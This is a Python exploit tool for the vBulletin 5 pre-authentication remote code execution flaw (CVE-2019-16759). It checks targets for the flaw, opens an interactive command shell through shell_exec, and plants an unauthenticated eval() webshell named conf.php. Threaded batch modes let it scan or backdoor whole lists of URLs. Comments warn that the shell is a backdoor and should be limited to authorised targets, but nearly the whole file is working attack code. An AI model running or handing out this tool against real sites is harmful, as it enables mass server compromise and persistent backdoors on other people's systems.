```python
# coding:utf-8
# Author:LSA
# Description:vbulletin 5 rce
# Date:20190927
# vbulletin 5 RCE exploitation tool (batch check / getshell): pre-auth PHP injection through the
# widgetConfig[code] parameter of the ajax/render/widget_php route (CVE-2019-16759)
import requests
import sys
import optparse
import threading
import datetime
import os
import Queue
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every request below uses verify=False; silence the per-request TLS warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Python 2-only hack (reload() builtin, sys.setdefaultencoding) to make implicit
# str/unicode conversions use UTF-8. The rest of the file is Python 2 as well
# (print statements, raw_input, the Queue module), so it does not run on 3.x.
reload(sys)
sys.setdefaultencoding('utf-8')
# Fixed browser-looking User-Agent (an old Chrome 17 string) sent with every request.
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
}
# POST body for every request: the vBulletin route is fixed here and the PHP to
# execute is added later under the "widgetConfig[code]" key.
# NOTE: this single dict is mutated in place by every function below, so it is
# shared state across threads; the batch workers all write the same value before
# posting, which is why that happens to be safe.
params = {"routestring":"ajax/render/widget_php"}
# Serialises writes to the batch result file (the succ counter is NOT updated under it).
lock = threading.Lock()
# Work queue of target URLs and the worker threads draining it (batch modes only).
q0 = Queue.Queue()
threadList = []
# `global` at module scope is a no-op; succ counts vulnerable / shelled targets.
global succ
succ = 0
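def checkVbulletin5Rce(tgtUrl, timeout):
    """Return True if *tgtUrl* executes PHP supplied in widgetConfig[code].

    Posts the ajax/render/widget_php route with a PHP snippet that echoes a
    fixed canary and looks for that canary in a 200 response.

    Two deliberate differences from the shell_exec-based probe this replaces:
      * only PHP ``echo`` is used, so the check does not report "not
        vulnerable" merely because shell functions are disabled on the target;
      * the canary is sent as two concatenated halves, so the full string is
        never present in the request body and a page that simply reflects
        POST data cannot produce a false positive.

    Args:
        tgtUrl:  base URL of the vBulletin install (scheme, host, optional path).
        timeout: per-request timeout in seconds.

    Returns:
        True when the canary came back in a 200 response; False otherwise,
        including on any network/HTTP error (same policy as the batch worker,
        which also treats unreachable targets as not vulnerable).
    """
    canary = 'fe0a612646c36e7f89b5b81f8f141d3d'
    # Work on a private copy so the shared module-level `params` is not mutated.
    payload = dict(params)
    payload["widgetConfig[code]"] = "echo '%s' . '%s'; exit;" % (canary[:8], canary[8:])
    try:
        rsp = requests.post(tgtUrl, headers=headers, verify=False, data=payload, timeout=timeout)
    except requests.exceptions.RequestException as exc:
        # Report instead of dying with a traceback; an unreachable host is
        # "not vulnerable" from the tool's point of view.
        print('Request to ' + tgtUrl + ' failed: ' + str(exc))
        return False
    return rsp.status_code == 200 and canary in rsp.text.encode('utf-8')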
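def checkVbulletin5RceBatch(timeout, f4success):
    """Worker: drain the shared queue q0, probing each URL for the widgetConfig[code] RCE.

    Several copies run in parallel threads (see __main__). Each vulnerable
    target is printed, appended to *f4success* and counted in the module-global
    ``succ``; the file write and the counter update both happen under ``lock``.
    Targets that time out, refuse connections or error in any other way are
    skipped silently, as before. The probe is the same pure-PHP canary used by
    checkVbulletin5Rce (no shell_exec, canary split so it is not in the request).

    Args:
        timeout:   per-request timeout in seconds.
        f4success: open, writable file object shared by all workers.
    """
    urllib3.disable_warnings()
    global succ
    canary = 'fe0a612646c36e7f89b5b81f8f141d3d'
    payload = dict(params)
    payload["widgetConfig[code]"] = "echo '%s' . '%s'; exit;" % (canary[:8], canary[8:])
    while True:
        # get_nowait() instead of empty()+get(): with several workers the queue
        # can drain between those two calls, and a blocking get() would then
        # hang this thread -- and the final join() in __main__ -- forever.
        try:
            tgtUrl = q0.get_nowait()
        except Queue.Empty:
            break
        qcount = q0.qsize()
        print('Checking: ' + tgtUrl + ' ---[' + str(countLines - qcount) + '/' + str(countLines) + ']')
        try:
            rst = requests.post(tgtUrl, headers=headers, data=payload, timeout=timeout, verify=False)
        except Exception:
            # Best-effort scan: any failure (timeout, connection error, bad URL)
            # just skips the target. `Exception` rather than a bare except so
            # SystemExit/KeyboardInterrupt are not swallowed.
            continue
        if rst.status_code == 200 and canary in rst.text.encode('utf-8'):
            print('Target is vulnerable!!!--- ' + tgtUrl + '\n')
            with lock:
                f4success.write('Target is vulnerable!!!---' + tgtUrl + '\n')
                # Counter update was previously unsynchronised across workers.
                succ += 1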
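def _phpSingleQuoted(text):
    """Return *text* as a PHP single-quoted string literal.

    Inside PHP '...' only the backslash and the quote itself are special, so
    those are the only characters escaped.
    """
    return "'" + text.replace('\\', '\\\\').replace("'", "\\'") + "'"


def getCmdShellVbulletin5Rce(tgtUrl, timeout):
    """Interactive pseudo-shell: run operator commands via shell_exec() on *tgtUrl*.

    Reads commands until 'exit' (or EOF / Ctrl-C), wraps each one as
    ``echo shell_exec('<cmd>'); exit;``, posts it through the widgetConfig[code]
    route and prints whatever the target returns.

    Notes for the operator:
      * The command is escaped for the PHP string literal, so quotes and
        backslashes reach the target shell intact (previously a single quote
        in the command broke the generated PHP and produced no output).
      * shell_exec returns stdout only; append ``2>&1`` to see stderr.
      * If shell_exec is disabled on the target the output is simply empty.
      * A network error is reported and the prompt continues instead of the
        session aborting with a traceback.

    Args:
        tgtUrl:  base URL of the vBulletin install.
        timeout: per-request timeout in seconds.
    """
    while True:
        try:
            cmd = raw_input("cmd>>> ")
        except (EOFError, KeyboardInterrupt):
            print('')
            break
        if cmd == 'exit':
            break
        if not cmd.strip():
            continue
        payload = dict(params)
        payload["widgetConfig[code]"] = "echo shell_exec(" + _phpSingleQuoted(cmd) + "); exit;"
        try:
            cmdResult = requests.post(tgtUrl, headers=headers, verify=False, data=payload, timeout=timeout)
        except requests.exceptions.RequestException as exc:
            print('Request failed: ' + str(exc))
            continue
        print(cmdResult.text.encode('utf-8'))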
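def vbulletin5RceGetshell(tgtUrl, timeout):
    """Drop a PHP webshell named conf.php on *tgtUrl* through the widgetConfig[code] RCE.

    The injected PHP is ``file_put_contents('conf.php', urldecode(...))`` where the
    encoded literal decodes to ``<?php @eval($_POST["x"]);?>``; the tool then
    requests ``<tgtUrl>/conf.php`` and reports success on a 200.

    Operational caveats:
      * The dropped file is an UNAUTHENTICATED backdoor -- anyone who finds
        conf.php can run code on the host. Use only on authorised targets,
        record the path, and remove the file when the engagement ends.
      * It is written relative to the PHP process's working directory and will
        overwrite an existing conf.php. That is presumably the web root next to
        index.php, but it is not guaranteed, and a 200 on /conf.php is only a
        heuristic (a catch-all router may answer 200 as well) -- verify by hand.
      * A trailing slash on *tgtUrl* no longer yields a "//conf.php" address,
        and network errors print a message instead of a traceback.

    Args:
        tgtUrl:  base URL of the vBulletin install.
        timeout: per-request timeout in seconds.
    """
    exp = 'file_put_contents(\'conf.php\',urldecode(\'%3c%3fphp%20@eval(%24_%50%4f%53%54%5b%22x%22%5d)%3b%3f%3e\')); exit;'
    payload = dict(params)
    payload["widgetConfig[code]"] = exp
    shellUrl = tgtUrl.rstrip('/') + '/conf.php'
    try:
        rsp = requests.post(tgtUrl, headers=headers, verify=False, data=payload, timeout=timeout)
        if rsp.status_code != 200:
            print('rsp something error.')
            return
        rsp1 = requests.get(shellUrl, verify=False, timeout=timeout)
    except requests.exceptions.RequestException as exc:
        print('Request failed: ' + str(exc))
        return
    print(rsp1.status_code)
    print(shellUrl)
    if rsp1.status_code == 200:
        print('Getshell successed!!!Shell addr:' + shellUrl + ':x')
    else:
        print('Getshell failed.')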
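def vbulletin5RceGetshellBatch(timeout, f4success):
    """Worker: drain the shared queue q0 and drop conf.php on every target.

    Same payload and caveats as vbulletin5RceGetshell, and the same threading
    contract as checkVbulletin5RceBatch: q0 is consumed with get_nowait() so a
    worker cannot block forever on an already-drained queue, hits are written
    to *f4success* and counted in ``succ`` under ``lock``, and any failing
    target is skipped. The follow-up GET to /conf.php is inside the same try
    block, so a timeout there no longer kills the worker thread.

    WARNING: every success leaves an unauthenticated eval() backdoor on the
    target; keep the success.txt list and clean those files up afterwards.

    Args:
        timeout:   per-request timeout in seconds.
        f4success: open, writable file object shared by all workers.
    """
    urllib3.disable_warnings()
    global succ
    exp = 'file_put_contents(\'conf.php\',urldecode(\'%3c%3fphp%20@eval(%24_%50%4f%53%54%5b%22x%22%5d)%3b%3f%3e\')); exit;'
    payload = dict(params)
    payload["widgetConfig[code]"] = exp
    while True:
        try:
            tgtUrl = q0.get_nowait()
        except Queue.Empty:
            break
        qcount = q0.qsize()
        print('Checking: ' + tgtUrl + ' ---[' + str(countLines - qcount) + '/' + str(countLines) + ']')
        shellUrl = tgtUrl.rstrip('/') + '/conf.php'
        try:
            rst = requests.post(tgtUrl, headers=headers, data=payload, timeout=timeout, verify=False)
            if rst.status_code != 200:
                continue
            rsp1 = requests.get(shellUrl, verify=False, timeout=timeout)
        except Exception:
            # Best-effort: skip the target on any error (narrower than a bare
            # except so interpreter-exit exceptions are not swallowed).
            continue
        if rsp1.status_code == 200:
            print('Getshell successed!!!Shell addr:' + shellUrl + ':x' + '\n')
            with lock:
                f4success.write('Getshell successed!!!Shell addr:' + shellUrl + ':x' + '\n')
                succ += 1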
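def _runBatch(worker, tgtFilePath, threads, timeout):
    """Load target URLs from *tgtFilePath* and run *worker* over them in threads.

    Creates batch_result/<timestamp>/success.txt, fills the shared queue q0
    (blank lines skipped), starts *threads* copies of *worker*, waits for them
    and prints the summary. The check and getshell batch modes previously
    duplicated this code; they now differ only in the worker passed in.

    Args:
        worker:      checkVbulletin5RceBatch or vbulletin5RceGetshellBatch.
        tgtFilePath: text file with one target URL per line.
        threads:     number of worker threads.
        timeout:     per-request timeout in seconds, passed to the worker.
    """
    global countLines
    nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
    resultDir = os.path.join('batch_result', nowtime)
    # makedirs: the plain mkdir used before failed unless ./batch_result already existed.
    os.makedirs(resultDir)
    with open(tgtFilePath) as urlsFile:
        for line in urlsFile:
            fullUrl = line.strip()
            if fullUrl:
                q0.put(fullUrl)
    # Progress denominator is the number of queued URLs, not raw file lines.
    countLines = q0.qsize()
    print('===Total ' + str(countLines) + ' urls===')
    with open(os.path.join(resultDir, 'success.txt'), 'w') as f4success:
        workers = [threading.Thread(target=worker, args=(timeout, f4success)) for _ in range(threads)]
        for t in workers:
            t.start()
            threadList.append(t)
        for t in workers:
            t.join()
    print('\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###')
    print('Results were saved in ./batch_result/' + nowtime + '/')


if __name__ == '__main__':
    print('''
********************************
* vbulletin 5 pre auth rce *
* Coded by LSA *
********************************
''')
    parser = optparse.OptionParser('python %prog ' + '-h (manual)', version='%prog v1.0')
    parser.add_option('-u', dest='tgtUrl', type='string', help='single url')
    # Help text fixed: without --getshell a URL file is only checked, not exploited.
    parser.add_option('-f', dest='tgtUrlsPath', type='string', help='urls filepath (check only unless --getshell)')
    parser.add_option('-s', dest='timeout', type='int', default=20, help='timeout(seconds)')
    parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')
    parser.add_option('--getshell', dest='getshell', action='store_true', help='get webshell')
    parser.add_option('--cmdshell', dest='cmdshell', action='store_true', help='cmd shell mode')
    (options, args) = parser.parse_args()
    getshell = options.getshell
    cmdshell = options.cmdshell
    timeout = options.timeout
    tgtUrl = options.tgtUrl
    countLines = 0
    # Previously both flags together silently did nothing; refuse instead.
    if cmdshell and getshell:
        parser.error('--cmdshell and --getshell are mutually exclusive')
    if not tgtUrl and not options.tgtUrlsPath:
        parser.print_help()
        sys.exit(1)
    # Single-target modes.
    if tgtUrl and (cmdshell is None) and (getshell is None):
        if checkVbulletin5Rce(tgtUrl, timeout):
            print('Target is vulnerable!!!' + '\n')
        else:
            print('Target is not vulnerable.' + '\n')
    elif tgtUrl and cmdshell:
        if checkVbulletin5Rce(tgtUrl, timeout):
            print('Target is vulnerable!!! Entering cmdshell...' + '\n')
        else:
            print('Target is not vulnerable.' + '\n')
            sys.exit()
        getCmdShellVbulletin5Rce(tgtUrl, timeout)
    elif tgtUrl and getshell:
        vbulletin5RceGetshell(tgtUrl, timeout)
    # Batch modes (a URL file may be given alongside -u, as before).
    if options.tgtUrlsPath and getshell:
        _runBatch(vbulletin5RceGetshellBatch, options.tgtUrlsPath, options.threads, timeout)
    elif options.tgtUrlsPath:
        _runBatch(checkVbulletin5RceBatch, options.tgtUrlsPath, options.threads, timeout)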
```